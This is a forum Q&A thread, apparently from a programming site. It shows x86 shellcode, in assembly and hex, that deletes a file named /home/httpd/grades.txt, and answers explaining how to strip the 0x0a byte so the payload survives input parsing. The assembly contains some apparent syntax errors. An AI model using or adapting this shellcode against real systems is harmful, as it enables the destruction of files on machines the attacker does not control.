# Eliminating 0x0a from ShellCode for unlink file

Tags: shellcode, assembly

I have written a shellcode to unlink a file from the system, but when I extracted the hexcode off the binary file, it consists of **\x0a** byte, because the sys call number for unlink function is 10, so it is essentially being treated as new line character while I excecute my hex code. Therefore, restricting rest of the code from excecuting.

**My shell is (shellcode.S):**

```
#include 

#define STRING  "/home/httpd/grades.txt"
#define STRLEN  22
#define CODE 0x05

.globl main
        .type   main, @function

 main:
        jmp     calladdr

 popladdr:
        popl    %esi
        xorl    %eax,%eax               /* get a 32-bit zero value */
        movb    %al,(STRLEN)(%esi)      /* null-terminate our string */

        addb    %ecx,5
        movb    $ecx,%al                /* syscall arg 1: syscall number */
        movl    %esi,%ebx               /* syscall arg 2: string pathname */
        int     $0x80                   /* invoke syscall */

        xorl    %ebx,%ebx               /* syscall arg 2: 0 */
        movl    %ebx,%eax
        inc     %eax                    /* syscall arg 1: SYS_exit (1), uses */
                                        /* mov+inc to avoid null byte */
        int     $0x80                   /* invoke syscall */

 calladdr:
        call    popladdr
        .ascii  STRING
```

**The hex code for bin file of shellcode is:**

```
char shellcode[] = "\xeb\x13\x5e\x31\xc0\x88\x46\x16\xb0\x0a\x89\xf3"
                   "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xe8\xff"
                   "\xff\xff\x2f\x68\x6f\x6d\x65\x2f\x68\x74\x74\x70"
                   "\x64\x2f\x67\x72\x61\x64\x65\x73\x2e\x74\x78\x74"
```

So, please suggest some method to eliminate, this with the same functioning of shellcode.

Thanks for help!

Comment: Don't see where unlink() is called in your shellcode but I think I managed around a similar issue before by storing the offending value with every bit flipped, and then performing an xor with 0xff.

Answer (score 1):

You can break `10` as `9` + `1` or any other combination to avoid `10`

For this, you can do something like:

```
movb $0x9, %al
inc %al
```

where,

- `movb $0x9, %al` will move `9` to `al` register
- `inc %al` will increment the content of `al` by one

This will help you avoid `\x0a` in your shellcode.